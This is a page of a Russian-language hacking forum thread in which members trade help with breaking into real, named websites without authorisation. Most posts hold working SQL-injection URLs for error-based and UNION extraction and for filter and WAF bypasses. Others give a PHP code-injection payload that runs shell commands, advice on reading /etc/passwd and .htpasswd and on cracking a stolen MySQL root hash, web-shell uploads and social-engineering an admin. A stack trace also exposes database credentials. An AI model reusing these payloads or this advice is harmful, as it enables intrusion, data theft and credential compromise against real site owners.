Просмотр полной версии : Ваши вопросы по уязвимостям.
Страницы :
1
2
3
4
5
[
6]
7
8
9
10
11
12
Вывел логин и пароль через xpath syntax error,ищу админку,нашёл токо phpmyadmin.
Ввожу данные и не подходят(пароль не хэш был,а незашифрованный!) .
Значит есть другая админка или проблема в другом?
Ошибка 1045 выводил . не удалось подключиться к mysql...
Apache/2.2.22 (@Release (https://antichat.live/members/44554/)@) Yii Framework (http://www.yiiframework.com/)/1.1.15
DezMond™
15.08.2016, 10:36
Хелп, не получается раскрутить(
http://www.byggecentrum.dk/kurser/k...t/produkter/sortering/kursusdato'/?no_cache=1 (http://www.byggecentrum.dk/kurser/kursuskategorier/handling/list/produkter/sortering/kursusdato'/?no_cache=1)
Octavian
16.08.2016, 02:09
есть урл такого вида site.com:8082,site.com:8088...что означяет даные порты....если я взломая 1 попаду на обШии сервак? как Это работает?
DezMond™ said:
↑ (https://antichat.live/posts/3981528/)
Хелп, не получается раскрутить(
http://www.byggecentrum.dk/kurser/k...t/produkter/sortering/kursusdato'/?no_cache=1 (http://www.byggecentrum.dk/kurser/kursuskategorier/handling/list/produkter/sortering/kursusdato'/?no_cache=1)
Легко и просто:
PHP:
http://www.byggecentrum.dk/kurser/kursuskategorier/handling/list/produkter/sortering/%60name%60,extractvalue(0x0a,concat(0x0a,(select+v ersion())))--+g/?no_cache=1
Только там с точками пробелы, но учитывая, что стоит на TYPO3, мне кажется структуру БД найти не будет проблемой.
Octavian said:
↑ (https://antichat.live/posts/3981809/)
есть урл такого вида site.com:8082,site.com:8088...что означяет даные порты....если я взломая 1 попаду на обШии сервак? как Это работает?
Это может быть CPanel, ISPManager и т.д. Скорее всего хостинг, так что перспективы иметь доступ ко всему малы. Может повезет, и ядро ОС старое, тогда есть шансы на полный контроль. Но я бы посоветовал начинать с основ, типа PHP.
SaNDER said:
↑ (https://antichat.live/posts/3981298/)
Вывел логин и пароль через xpath syntax error,ищу админку,нашёл токо phpmyadmin.
Ввожу данные и не подходят(пароль не хэш был,а незашифрованный!) .
Значит есть другая админка или проблема в другом?
Ошибка 1045 выводил . не удалось подключиться к mysql...
PhpMyAdmin - утилита для подключения к базе данных. Пароль к нему подойдет, только если ты взял его из `mysql`.`user`.
Если пароль взят из другой таблицы, то определенно есть другая админка. Поищи еще.
Если есть стандартная форма авторизации, попробуй через нее, возможно ссылка на админку появится сама.
И да, Yii является фреймворком, а не CMS. Советую, тоже, основы.
demafly76
17.08.2016, 16:23
не понимаю обясните! можн ли как обойти, режет from и остальное.
в корне есть phpinfo
Code:
http://www.securmed.it/it/catalogo.php?cat=-3+union+select+1,version(),3+sec_categoria+--+
и еще вопрос что с этим делать, хех
No se puede ejecutar el query, error: XPATH syntax error: ':root:*4F23645A18ABD4FACEB00C9BC'
и еще вопрос что с этим делать, хех
No se puede ejecutar el query, error: XPATH syntax error: ':root:*4F23645A18ABD4FACEB00C9BC'[/QUOTE]
demafly76 said:
↑ (https://antichat.live/posts/3982311/)
не понимаю обясните! можн ли как обойти, режет from и остальное.
в корне есть phpinfo
Code:
http://www.securmed.it/it/catalogo.php?cat=-3+union+select+1,version(),3+sec_categoria+--+
и еще вопрос что с этим делать, хех
No se puede ejecutar el query, error: XPATH syntax error: ':root:*4F23645A18ABD4FACEB00C9BC'
Это логин и пароль.Даже имя root само за себя говорит .
Как я понял ты через extractvalue вывоил?Там выводи в 31 символ наскоко я помню.
А hash на MySQL 5 в 40 символов .
winstrool
17.08.2016, 23:31
SaNDER said:
↑ (https://antichat.live/posts/3982469/)
и еще вопрос что с этим делать, хех
Используйте функцию mid() для вывода первой части, а затем второй части пароля
http://dev.web3.6893-2.whserv.de/index.php?id=-347 .
Как обойти TYPO3?Тут версия 6.2.25
------------------------------------------------------------
Подключился через SH к айпи сервера . Как curl закачать ?
demafly76
18.08.2016, 08:56
SaNDER said:
↑ (https://antichat.live/posts/3982469/)
Это логин и пароль.Даже имя root само за себя говорит .
Как я понял ты через extractvalue вывоил?Там выводи в 31 символ наскоко я помню.
А hash на MySQL 5 в 40 символов .
да через extractvalue, а вот про вывод в 31 символ тут я не догнал с этим
demafly76
18.08.2016, 09:19
winstrool said:
↑ (https://antichat.live/posts/3982489/)
Используйте функцию mid() для вывода первой части, а затем второй части пароля
ok, спс! получилось, root::*4F23645A18ABD4FACEB00C9BCC5C1C238396B5E2
реально пароль вытащить?
winstrool
18.08.2016, 10:41
demafly76 said:
↑ (https://antichat.live/posts/3982547/)
ok, спс! получилось, root::*4F23645A18ABD4FACEB00C9BCC5C1C238396B5E2
реально пароль вытащить?
Пробуйте брутеть по словарикам, грубым перебором, тема /threads/218185/ (https://antichat.live/threads/218185/) - Софт для брута или чекайте на паблик сервисах, на наличие уже сбрученых паролей
Чем можно заменить(обойти) запятую при запросе ( UNION SELECT 1,2,3.... )
на сервере код:
Code:
$cookie=explode(',', $cookie);
BabaDook
18.08.2016, 12:59
myblitz said:
↑ (https://antichat.live/posts/3982653/)
Чем можно заменить(обойти) запятую при запросе ( UNION SELECT 1,2,3.... )
на сервере код:
Code:
$cookie=explode(',', $cookie);
Джоин
myblitz said:
↑ (https://antichat.live/posts/3982653/)
Чем можно заменить(обойти) запятую при запросе ( UNION SELECT 1,2,3.... )
на сервере код:
Code:
$cookie=explode(',', $cookie);
union (select*from(select 1)a1 join(select 2)a2 join (select 3)a3
Есть доступ к модему в сети A. В сети A есть SQL-сервер, который подключения с чужих IP не принимает. Модель модема в сети A - APC7932. Возможно ли поднять прокси/etc. на модеме, чтобы подключиться к базе?
Нашел на сайте SQL Injection:
http://site.ru/search/?num=13750-01a'
с такой ошибкой:
Database error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
но не могу определить количество столбцов. Через GROUP BYопределить никак не получается. Делал так:
http://site.ru/search/?num=13750-01a' GROUP BY 2 --
Database error:Unknown column '2' in 'group statement'
если выводится такая ошибка, значит количество столбцов меньше 2, что странно. Естественно далее делаю так:
http://site.ru/search/?num=13750-01a' GROUP BY 1 --
Database error:Can't group on 'cnt'
что за ошибка такая? Гугл не помог.
А вотORDER BYработает немного по другому:
http://site.ru/search/?num=13750-01a' ORDER BY 2 --
Database error:Unknown column '2' in 'order clause'
тут все как и в первом случае. А если сделать так:
http://site.ru/search/?num=13750-01a' ORDER BY 1 --
то никаких ошибок нет и все отображается нормально, в отличии от первого варианта сGROUP BY.
И чтобы окончательно убедиться делал так:
http://site.ru/search/?num=13750-01a' UNION SELECT 1 --
Database error:The used SELECT statements have a different number of columns
причем пробовал указывать вUNION SELECTнесколько столбцов, вплоть до 10, но ошибка не меняется.
В общем, требуется помощь.
BabaDook
22.08.2016, 17:21
"]
[XOR] said:
↑ (https://antichat.live/posts/3983864/)
Нашел на сайте SQL Injection:
http://site.ru/search/?num=13750-01a'
с такой ошибкой:
Database error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
но не могу определить количество столбцов. Через
GROUP BY
определить никак не получается. Делал так:
http://site.ru/search/?num=13750-01a' GROUP BY 2 --
Database error:Unknown column '2' in 'group statement'
если выводится такая ошибка, значит количество столбцов меньше 2, что странно. Естественно далее делаю так:
http://site.ru/search/?num=13750-01a' GROUP BY 1 --
Database error:Can't group on 'cnt'
что за ошибка такая? Гугл не помог.
А вот
ORDER BY
работает немного по другому:
http://site.ru/search/?num=13750-01a' ORDER BY 2 --
Database error:Unknown column '2' in 'order clause'
тут все как и в первом случае. А если сделать так:
http://site.ru/search/?num=13750-01a' ORDER BY 1 --
то никаких ошибок нет и все отображается нормально, в отличии от первого варианта с
GROUP BY
.
И чтобы окончательно убедиться делал так:
http://site.ru/search/?num=13750-01a' UNION SELECT 1 --
Database error:The used SELECT statements have a different number of columns
причем пробовал указывать в
UNION SELECT
несколько столбцов, вплоть до 10, но ошибка не меняется.
В общем, требуется помощь.
union+select+concan(user())
Вариантов много может быть.
Пробуйте лучше еррор
Ereee said:
↑ (https://antichat.live/posts/3982908/)
Есть доступ к модему в сети A. В сети A есть SQL-сервер, который подключения с чужих IP не принимает. Модель модема в сети A - APC7932. Возможно ли поднять прокси/etc. на модеме, чтобы подключиться к базе?
APC7932 - гугл выдает что это ИБП стоечный. Если и вправду ИБП, то посмотри, можно ли там включить доступ по SSH. Если можно, то законекться к нему с параметром -D
korneev said:
↑ (https://antichat.live/posts/3984396/)
APC7932 - гугл выдает что это ИБП стоечный. Если и вправду ИБП, то посмотри, можно ли там включить доступ по SSH. Если можно, то законекться к нему с параметром -D
Включил SSH, вырубился Telnet. SSH тоже не работает. Прогуглив узнал, что прошивка у этих моделей бажная. Так что все, кто встретят такие модели - поосторожней. Все равно спасибо!
MaxxWell
26.08.2016, 14:30
http://sirus.su/in.php Что можно извлечь полезного ? sirus.su?robots.txt?file=config.php можно ли так прочитать данный файл, где то я видел видео на эту тему.
MaxxWell said:
↑ (https://antichat.live/posts/3984938/)
http://sirus.su/in.php
Что можно извлечь полезного ? sirus.su?robots.txt?file=config.php можно ли так прочитать данный файл, где то я видел видео на эту тему.
LFI через phpinfo() разве что.
но нужен инклуд.
MaxxWell
26.08.2016, 15:38
pw0ned said:
↑ (https://antichat.live/posts/3984951/)
LFI через phpinfo() разве что.
но нужен инклуд.
А где ж его взять то?))
kacergei
26.08.2016, 16:47
Имеется сайт site.ru/ajax/Areas/Product/
Если в cookies поставить ' в timezone, то выдает следующее:
.SpoilerTarget" type="button">Spoiler: Ответ HTTP 500:
Code:
Exception Object
(
[message:protected] => DateTimeZone::__construct(): Unknown or bad timezone (')
[string:Exception:private] =>
[code:protected] => 0
[file:protected] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line:protected] => 164
[trace:Exception:private] => Array
(
[0] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line] => 164
[function] => __construct
[class] => DateTimeZone
[type] => ->
[args] => Array
(
[0] => '
)
)
[1] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line] => 141
[function] => checkConnect
[class] => MYSQL_DB
[type] => ->
[args] => Array
(
)
)
[2] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line] => 74
[function] => __construct
[class] => MYSQL_DB
[type] => ->
[args] => Array
(
[0] => site_work
[1] => 01cNWgm3qbNeRWn6uHMUzOPI3CRVJZJ
[2] => satom
[3] => 127.0.0.1
[4] => 3307
)
)
[3] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/model/DefaultModel.class.php
[line] => 75
[function] => DB
[class] => MYSQL_DB
[type] => ::
[args] => Array
(
)
)
[4] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/model/MailQueueModel.class.php
[line] => 22
[function] => __construct
[class] => DefaultModel
[type] => ->
[args] => Array
(
[0] => mail_queue
)
)
[5] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/mail/QueueMailer.class.php
[line] => 39
[function] => __construct
[class] => MailQueueModel
[type] => ->
[args] => Array
(
)
)
[6] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/SendMail.class.php
[line] => 56
[function] => send
[class] => QueueMailer
[type] => ->
[args] => Array
(
[0] => errors@site.com
[1] => Timezone Error
[2] =>
Здесь может быть sql-injection или это просто вывод ошибки такой?
MaxxWell
26.08.2016, 16:52
Как подобрать если не выводит кол-во?
Code:
http://www.premium-network.ru/index.php?id=-tariffs_internet%27+order+by+100+--+
kacergei
26.08.2016, 17:48
MaxxWell said:
↑ (https://antichat.live/posts/3984980/)
Как подобрать если не выводит кол-во?
Code:
http://www.premium-network.ru/index.php?id=-tariffs_internet%27+order+by+100+--+
Попробуй другой URL))
Code:
http://www.premium-network.ru/index.php?id=add&used=faq&s=3
.SpoilerTarget" type="button">Spoiler: подсказка
Code:
---
Parameter: s (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=add&used=faq&s=3' AND 9304=9304 AND 'HJyF'='HJyF
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=add&used=faq&s=3' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176706a71,(SELECT (ELT(3147=3147,1))),0x7171786271,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'xSeN'='xSeN
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=add&used=faq&s=3' AND SLEEP(5) AND 'PmOg'='PmOg
---
web server operating system: FreeBSD
web application technology: PHP 5.4.26, Apache 2.2.27
back-end DBMS: MySQL >= 5.5
banner: '5.5.37'
current user: 'forumpt@localhost'
current database: 'new_premium'
current user is DBA: False
database management system users [1]:
'forumpt'@'localhost'
available databases [3]:
forumpt
information_schema
new_premium
kacergei said:
↑ (https://antichat.live/posts/3984978/)
Имеется сайт site.ru/ajax/Areas/Product/
Если в cookies поставить
'
в timezone, то выдает следующее:
Spoiler: Ответ HTTP 500:
Code:
Exception Object
(
[message:protected] => DateTimeZone::__construct(): Unknown or bad timezone (')
[string:Exception:private] =>
[code:protected] => 0
[file:protected] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line:protected] => 164
[trace:Exception:private] => Array
(
[0] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line] => 164
[function] => __construct
[class] => DateTimeZone
[type] => ->
[args] => Array
(
[0] => '
)
)
[1] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line] => 141
[function] => checkConnect
[class] => MYSQL_DB
[type] => ->
[args] => Array
(
)
)
[2] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
[line] => 74
[function] => __construct
[class] => MYSQL_DB
[type] => ->
[args] => Array
(
[0] => site_work
[1] => 01cNWgm3qbNeRWn6uHMUzOPI3CRVJZJ
[2] => satom
[3] => 127.0.0.1
[4] => 3307
)
)
[3] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/model/DefaultModel.class.php
[line] => 75
[function] => DB
[class] => MYSQL_DB
[type] => ::
[args] => Array
(
)
)
[4] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/model/MailQueueModel.class.php
[line] => 22
[function] => __construct
[class] => DefaultModel
[type] => ->
[args] => Array
(
[0] => mail_queue
)
)
[5] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/mail/QueueMailer.class.php
[line] => 39
[function] => __construct
[class] => MailQueueModel
[type] => ->
[args] => Array
(
)
)
[6] => Array
(
[file] => /var/www/site/data/releases/sources/3.4.40/oop/SendMail.class.php
[line] => 56
[function] => send
[class] => QueueMailer
[type] => ->
[args] => Array
(
[0] => errors@site.com
[1] => Timezone Error
[2] =>
Здесь может быть sql-injection или это просто вывод ошибки такой?
Ошибка скрипта вроде как.
demafly76
26.08.2016, 18:55
Code:
http://site.ru/news-post.php?id=-1'+/*!50000Union*/+Select+1,schema_name,3,4,5,6+From+/*!information_schema.schemata+limit+0,2*/+--+sp
стоит mod_security, выводит только 1 базу, с таблицами также! добавлял limit и group_concat, таже фигня mod_security не ругается, что может быть?
version:
5.5.42-37.1-log
BabaDook
26.08.2016, 22:32
MaxxWell said:
↑ (https://antichat.live/posts/3984938/)
http://sirus.su/in.php
Что можно извлечь полезного ? sirus.su?robots.txt?file=config.php можно ли так прочитать данный файл, где то я видел видео на эту тему.
можно исходники читать
MaxxWell
26.08.2016, 22:46
BabaDook said:
↑ (https://antichat.live/posts/3985063/)
можно исходники читать
В пм пожалуйста можешь описать в кратце как??
MaxxWell
27.08.2016, 02:16
Всё уже.
NonBlizz
27.08.2016, 19:12
Не много запутался) есть уязвимость:
Code:
http://www.site.ru/publ.html'*updatexml(1,concat(0x3A,user(),version( )),1)*'
version (5.1.69)а как мне вывести таблицы с information_schema....
P.S совсем башка не варит, колят магнезию(
demafly76
27.08.2016, 19:34
NonBlizz said:
↑ (https://antichat.live/posts/3985289/)
Не много запутался) есть уязвимость:
Code:
http://www.site.ru/publ.html'*updatexml(1,concat(0x3A,user(),version( )),1)*'
version
(5.1.69)
а как мне вывести таблицы с information_schema....
P.S совсем башка не варит, колят магнезию(
extractvalue(rand(),concat(0x3a,(select+concat(0x3 a,table_name)+from+information_schema.tables+limit +0,1)))+--+
NonBlizz
28.08.2016, 01:46
Code:
http://www.site.ru/pis.php/view/(2)union(select(1),(select(@x)from(select(@x:=0x00 ),(select(0)from(information_schema.columns)where( table_schema!=0x696e666f726d6174696f6e5f736368656d 61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_sche ma,0x2e,table_name,0x3a,column_name))))x),3)
Вывел таблицы с БД.
Допустим есть таблица pwd.pwd-users c колонками pass,uname,email как мне вывести их содержимое за помощь ++
P.S Магнезия всё ещё долбит по шарам=)
BabaDook
28.08.2016, 03:00
NonBlizz said:
↑ (https://antichat.live/posts/3985359/)
Code:
http://www.site.ru/pis.php/view/(2)union(select(1),(select(@x)from(select(@x:=0x00 ),(select(0)from(information_schema.columns)where( table_schema!=0x696e666f726d6174696f6e5f736368656d 61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_sche ma,0x2e,table_name,0x3a,column_name))))x),3)
Вывел таблицы с БД.
Допустим есть таблица pwd.pwd-users c колонками pass,uname,email как мне вывести их содержимое за помощь ++
P.S Магнезия всё ещё долбит по шарам=)
select concat(pass,uname,email) from pwd.pwd-users
NonBlizz
28.08.2016, 09:06
BabaDook said:
↑ (https://antichat.live/posts/3985374/)
select concat(pass,uname,email) from pwd.pwd-users
Я уже так пробовал)) итог пустая страница, с from pwd.pwd-user limit 1,1 тоже
Точнее не то чтобы пустая страница, а просто не выводит инфу.
from pwd.pwd-user идёт же перед 3) ?
NonBlizz
28.08.2016, 09:32
boyiciyez said:
↑ (https://antichat.live/posts/3985390/)
http://www.legalsteroid.ru/'*updatexml(0,repeat((select+version()),2),2)*
'
как раскрутить в sqlmap или просто сдампить?)
немогу дальше понять как крутить
Другой вектор error-based пробуй.
Code:
http://www.legalsteroid.ru/'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1
version: 5.5.50-MariaDB
user: steroid_legal@localhost
database: steroid_legal
Дальше поймёшь?
NonBlizz
29.08.2016, 02:26
Code:
http://site.ru/info/1'or(ExtractValue(1,concat(0x3a,(select(database() )))))='1
Выводит...
Подскажите как извлечь инфу из Information.schema.. На примере этого запроса...
Пробывал так:
Code:
http://site.ru/info/1'or(extractvalue(rand(),concat(0x3a,(select+conca t(0x3a,table_name)+from+information_schema.tables+ limit+0,1)))+--+
выводит такую ошибку:
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from+information_schema.tables+limit+0,1)))+--+') = 0 ) OR baner.id_baner IN (SE' at line 1
При запросе:
Code:
http://site.ru/info/1'and(extractvalue(1,concat(0x3a,(select(table_nam e)from(information_schema.tables)))))='1
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[21000]: Cardinality violation: 1242 Subquery returns more than 1 row
Шо не так делаю?
есть форум на булке,так же есть данные админа,на форуме получается залогиниться,но когда перехожу по адресу site.ru/forum/admincp/ ,там стоит бейсик авторизация,можно как то ее обойти?
R3hab said:
↑ (https://antichat.live/posts/3985766/)
есть форум на булке,так же есть данные админа,на форуме получается залогиниться,но когда перехожу по адресу site.ru/forum/admincp/ ,там стоит бейсик авторизация,можно как то ее обойти?
засоциалить другого админа. мы так похекали булку пару лет назад. было весело)
напиши другому админу в пм, мол пароль что то не подходит, может он сменил ее и забыл предупредить.
Konqi said:
↑ (https://antichat.live/posts/3985785/)
засоциалить другого админа. мы так похекали булку пару лет назад. было весело)
напиши другому админу в пм, мол пароль что то не подходит, может он сменил ее и забыл предупредить.
то есть пароль от форума и админки могут отличатся?
NonBlizz
29.08.2016, 18:11
Konqi said:
↑ (https://antichat.live/posts/3985785/)
засоциалить другого админа. мы так похекали булку пару лет назад. было весело)
напиши другому админу в пм, мол пароль что то не подходит, может он сменил ее и забыл предупредить.
Подскажи мне с Error based плиз=) выше на 3 сообщения...
R3hab said:
↑ (https://antichat.live/posts/3985807/)
то есть пароль от форума и админки могут отличатся?
не от самой админки, а от бейсик авторизации. юзай СИ.
Подскажи мне с Error based плиз=) выше на 3 сообщения...
http://site.ru/info/1'or extractvalue(1,concat(0x3a,(select table_name from information_schema.tables limit 0,1)))='1
Konqi said:
↑ (https://antichat.live/posts/3985816/)
не от самой админки, а от бейсик авторизации. юзай СИ.
этот пароль в бд не хранится?
R3hab said:
↑ (https://antichat.live/posts/3985817/)
этот пароль в бд не хранится?
нет, обычно хранится в файле .htpasswd (если там апач). если есть права на чтение файлов (file_priv=y) в MySQL то попробуй прочитать .htpasswd и расшифровать хэш. Там обычно хэш в формате md5(APR) или Des(Unix)
NonBlizz
29.08.2016, 18:45
Konqi said:
↑ (https://antichat.live/posts/3985816/)
не от самой админки, а от бейсик авторизации. юзай СИ.
http://site.ru/info/1'or
extractvalue(1,concat(0x3a,(select table_name from information_schema.tables limit 0,1)))='1
Блин братух чё то не фига)) там походу стоит фильтрация всех типов пробелов или как, короче вот смотри:
Code:
http://ppt.ru/info/1'or%20extractvalue(1,concat(0x3a,(select%20table_ name%20from%20information_schema.tables%20limit%20 0,1)))='1
Не раз уже с такой проблемой сталкиваюсь, и вот как вывести список таблиц((
NonBlizz said:
↑ (https://antichat.live/posts/3985838/)
Блин братух чё то не фига)) там походу стоит фильтрация всех типов пробелов или как, короче вот смотри:
Code:
http://ppt.ru/info/1'or%20extractvalue(1,concat(0x3a,(select%20table_ name%20from%20information_schema.tables%20limit%20 0,1)))='1
Не раз уже с такой проблемой сталкиваюсь, и вот как вывести список таблиц((
вместо пробелов можно юзать одно из этих.
/**/, %0d, %0a, %0c, %09
вариантов куча.
NonBlizz
29.08.2016, 19:04
Konqi said:
↑ (https://antichat.live/posts/3985846/)
вместо пробелов можно юзать одно из этих.
/**/, %0d, %0a, %0c, %09
вариантов куча.
Пробую и не помогает чё то..... в чём дело не пойму..
NonBlizz
29.08.2016, 19:07
Konqi said:
↑ (https://antichat.live/posts/3985846/)
вместо пробелов можно юзать одно из этих.
/**/, %0d, %0a, %0c, %09
вариантов куча.
Вот пример:
Code:
http://ppt.ru/info/1'or%0aextractvalue(1,concat(0x3a,(select%0atable_ name%0afrom%0ainformation_schema.tables%0alimit%0a 0,1)))='1
Код ошибки:
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%0aextractvalue(1,concat(0x3a,(select%0atable_nam e%0afrom%0ainformation_schema.t' at line 1
NonBlizz said:
↑ (https://antichat.live/posts/3985849/)
Вот пример:
Code:
http://ppt.ru/info/1'or%0aextractvalue(1,concat(0x3a,(select%0atable_ name%0afrom%0ainformation_schema.tables%0alimit%0a 0,1)))='1
Код ошибки:
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%0aextractvalue(1,concat(0x3a,(select%0atable_nam e%0afrom%0ainformation_schema.t' at line 1
судя по ошибке дело в том что данные попадают напрямую в запрос, без урлэнкода, в принципе ты можешь попробовать просто написать пробел вместо %20, ну или использовать аналог пробела /**/
NonBlizz
29.08.2016, 22:15
t0ma5 said:
↑ (https://antichat.live/posts/3985872/)
судя по ошибке дело в том что данные попадают напрямую в запрос, без урлэнкода, в принципе ты можешь попробовать просто написать пробел вместо %20, ну или использовать аналог пробела /**/
Заместо пробелов ставил этот символ /**/
Code:
http://ppt.ru/info/1'or/**/extractvalue(1,concat(0x3a,(select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1)))='1
Результат:
Просто редирект на главную страницу:
http://ppt.ru/ без ошибок и т.д
Есть возможность залить шелл через бекдор, но при заливке через wget,curl или copy - автоматом на любой файл выставляются засратые права не позволяющие его запустить. chmod не помогает права меняются, но на выполнение всё равно нет. В других форматах (не php) пробовал притягивать - та же история. Можно что то придумать чтобы как то получить нормальные права и запустить шелл?
keran.am/catalog/296-fonariki/1'%22-fonar_909_9led_3aaa.html помогите раскрутить
Sensoft said:
↑ (https://antichat.live/posts/3986341/)
keran.am/catalog/296-fonariki/1'%22-fonar_909_9led_3aaa.html помогите раскрутить
HTML:
http://keran.am/catalog/296-fonariki/119-fonar.html'or(ExtractValue(1,concat(0x3a,(select(v ersion())))))='1
R3hab said:
↑ (https://antichat.live/posts/3986356/)
HTML:
http://keran.am/catalog/296-fonariki/119-fonar.html'or(ExtractValue(1,concat(0x3a,(select(v ersion())))))='1
Спасибо, подправил за место версии поставил INFORMATION_SCHEMA узнал bd
залил шелл на сайт,но не хочет открываться,выдает ошибку
500 Internal Server Error
можно ее как то обойти?
R3hab said:
↑ (https://antichat.live/posts/3986369/)
залил шелл на сайт,но не хочет открываться,выдает ошибку
можно ее как то обойти?
Попробуй залить другой, мог антивирус сервака удалить. Или там права на файлы поставлены тогда да, надо как то обходить
R3hab said:
↑ (https://antichat.live/posts/3986369/)
залил шелл на сайт,но не хочет открываться,выдает ошибку
можно ее как то обойти?
Значит не залил. Возможно обращаешься по неправильному пути.
pw0ned said:
↑ (https://antichat.live/posts/3986378/)
Значит не залил. Возможно обращаешься по неправильному пути.
если бы не залилось,то выдавало бы другую ошибку
404 Not Found
R3hab said:
↑ (https://antichat.live/posts/3986379/)
если бы не залилось,то выдавало бы другую ошибку
точно.
ну тогда видимо chmod, выставлены права на папку к которой обращаешься.
kacergei
01.09.2016, 03:37
Имеется sql-inj через нее можно смотреть файлы
....mid((cast(concat(load_file(/etc/passwd),.....
Возможно ли вывод load_file сделать в base64?
kacergei said:
↑ (https://antichat.live/posts/3986584/)
Имеется sql-inj через нее можно смотреть файлы
....mid((cast(concat(load_file(/etc/passwd),.....
Возможно ли вывод load_file сделать в base64?
Эм sql на файлы ?! Это как, не я не чего против не имею может просто не знал, если кто прошаренный киньте ссылку на подробное описани
kacergei
01.09.2016, 09:21
Sensoft said:
↑ (https://antichat.live/posts/3986607/)
Эм sql на файлы ?! Это как, не я не чего против не имею может просто не знал, если кто прошаренный киньте ссылку на подробное описани
Я наверно немножко неправильно выразился: "Load File: Читает содержимое файла и возвращает его в виде строки."
Если у пользователя достаточно прав
Но вопрос остается открытым
kacergei said:
↑ (https://antichat.live/posts/3986584/)
Имеется sql-inj через нее можно смотреть файлы
....mid((cast(concat(load_file(/etc/passwd),.....
Возможно ли вывод load_file сделать в base64?
можно, а толку, все равно по одному символу выводить
kacergei
01.09.2016, 13:38
yarbabin said:
↑ (https://antichat.live/posts/3986656/)
можно, а толку, все равно по одному символу выводить
Не подскажешь как именно? на будущее
http://dev.mysql.com/doc/refman/5.7/en/string-functions.html#function_to-base64
Как эту php injection раскрутить ?
http://rimo.su/poisk-po-katalogu/?search=${@print(dump.sql)} (http://rimo.su/poisk-po-katalogu/?search=%24%7b%40print(dump.sql)%7d)
?search=${system($_GET[c])}&c=ls -la
Вопрос кто сделал что теперь когда переходишь по ссылки там написано "страдать ****" на английском
Ребят помогите раскрутить
Code:
http://trafficswirl.com/teamsplash.php?tid=1%27
Ни как мне эта скуля не дается((
с --technique=EU не крутит, --level=5 --risk=3 тоже не крутит, ХАВИДЖИ раскручивает эту уязвимость, sqlmap не может(
либо я дурак либо лыжи правда не едут....
уязвимость раскручивается точно знаю, только как?(
r1l said:
↑ (https://antichat.live/posts/3987083/)
Ребят помогите раскрутить
Code:
http://trafficswirl.com/teamsplash.php?tid=1%27
Ни как мне эта скуля не дается((
с --technique=EU не крутит, --level=5 --risk=3 тоже не крутит, ХАВИДЖИ раскручивает эту уязвимость, sqlmap не может(
либо я дурак либо лыжи правда не едут....
уязвимость раскручивается точно знаю, только как?(
WAF блочит если я не ошибаюсь. Крути руками
pw0ned said:
↑ (https://antichat.live/posts/3987098/)
WAF блочит если я не ошибаюсь. Крути руками
Ошибаешься waf не причём
+ логично если хав обошёл мамп тем более сможет обойти
demafly76
02.09.2016, 15:24
r1l said:
↑ (https://antichat.live/posts/3987083/)
Ребят помогите раскрутить
Code:
http://trafficswirl.com/teamsplash.php?tid=1%27
Ни как мне эта скуля не дается((
с --technique=EU не крутит, --level=5 --risk=3 тоже не крутит, ХАВИДЖИ раскручивает эту уязвимость, sqlmap не может(
либо я дурак либо лыжи правда не едут....
уязвимость раскручивается точно знаю, только как?(
Code:
http://trafficswirl.com/teamsplash.php?tid=1'+union+select+version(),2+--+
Sensoft said:
↑ (https://antichat.live/posts/3987099/)
Ошибаешься waf не причём
+ логично если хав обошёл мамп тем более сможет обойти
Ты сам в мап уязвимость пихал ? Говорю ваф блочит, ты не слушаешь
demafly76
02.09.2016, 15:37
Code:
http://trafficswirl.com/teamsplash.php?tid=-1'+union+select+schema_name,2+/*!From*/+information_schema.schemata+--+sp
В ссылках вывод
pw0ned said:
↑ (https://antichat.live/posts/3987102/)
Ты сам в мап уязвимость пихал ? Говорю ваф блочит, ты не слушаешь
Сувал но по логам нет не чего на счёт ваф у меня норм проходит
ваф меня пропускает
Sensoft said:
↑ (https://antichat.live/posts/3987107/)
Сувал но по логам нет не чего на счёт ваф у меня норм проходит
ваф меня пропускает
ну-ка заскринь
все ребят, отбой раскрутил, ахаха, но всеравно спасибо)
r1l said:
↑ (https://antichat.live/posts/3987083/)
Ребят помогите раскрутить
Code:
http://trafficswirl.com/teamsplash.php?tid=1%27
Ни как мне эта скуля не дается((
